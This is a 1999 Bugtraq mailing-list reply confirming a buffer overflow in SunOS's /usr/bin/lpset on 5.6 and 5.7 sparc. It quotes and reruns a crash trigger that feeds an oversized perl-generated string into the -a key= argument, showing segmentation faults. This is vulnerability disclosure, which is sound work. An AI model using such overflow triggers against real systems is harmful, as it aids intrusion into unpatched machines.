[10543] in bugtraq
Re: SunOS 5.6 (X86) lpset vulnerability
daemon@ATHENA.MIT.EDU (Holt Sorenson)
Thu May 13 18:07:14 1999
Mime-Version: 1.0
Content-Type: multipart/signed; boundary=y0ulUmNC+osPPQO6; micalg=pgp-sha1;
protocol="application/pgp-signature"
Message-Id: <19990513121631.A717@sv.uen.org>
Date: Thu, 13 May 1999 12:16:31 -0600
Reply-To: Holt Sorenson <hso@UEN.ORG>
From: Holt Sorenson <hso@UEN.ORG>
X-To: "kim yong-jun homepage=ce.hannam.ac.kr/~s96192"
<bugscan@KOSNET.NET>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199905110243.LAA10770@kosnet.net>; from kim yong-jun
homepage=ce.hannam.ac.kr/~s96192 on Tue, May 11,
1999 at 11:43:46AM +0900
--y0ulUmNC+osPPQO6
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
On Tue, May 11, 1999 at 11:43:46AM +0900, kim yong-jun homepage=3Dce.hannam=
.ac.kr/~s96192 wrote:
> This is my second post to ButTraq.
> If this is old, I'm sorry.
>=20
>=20
> It's buffer overflow in "/usr/bin/lpset".
>=20
> View this command :
> [loveyou@/] % /usr/bin/lpset -a key=3D`perl -e 'print "x" x 1006'` lovey=
ou
>=20
> [loveyou@/] % /usr/bin/lpset -a key=3D`perl -e 'print "x" x 1007'` lovey=
ou
> Segmentation fault
This is also present on 2.6 sparc and on 2.7 sparc:
Thu May 13 12:11:59
host1 ~ 294 $ uname -a
SunOS host1 5.7 Generic_106541-01 sun4u sparc SUNW,Ultra-1
Thu May 13 12:12:10
host1 ~ 292 $ /usr/bin/lpset -a key=3D`perl -e 'print "x" x 1011'` alpr
Segmentation Fault
[host2] /home/user 131 > uname -a
SunOS host2 5.6 Generic_105181-13 sun4u sparc SUNW,Ultra-1
[host2] /home/user 131 > /usr/bin/lpset -a \=20
key=3D`perl -e 'print "x" x 1011'` alpr
Segmentation Fault
--=20
Holt Sorenson
hso@uen.org http://www.uen.org/staff/hso
PGP key id 0x4557CBD3 11/17/97 (DSS/Diffie-Hellman)
PGP key fingerprint "EED8 93AF 9A77 8A7A A7DB 5041 B7E1 47BA 4557 CBD3"
--y0ulUmNC+osPPQO6
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0 for non-commercial use
MessageID: Pn1JqDCrNx3tW9CNvcQ3UvmckkC4uiBI
iQA/AwUBNzsI7rfhR7pFV8vTEQJmgQCguofjWX3V8tdw0x7xYjdmMWLJ2X0AoONo
Wb4OoKYf2ry8dkVPhRjkuJxw
=pjyt
-----END PGP SIGNATURE-----
--y0ulUmNC+osPPQO6--
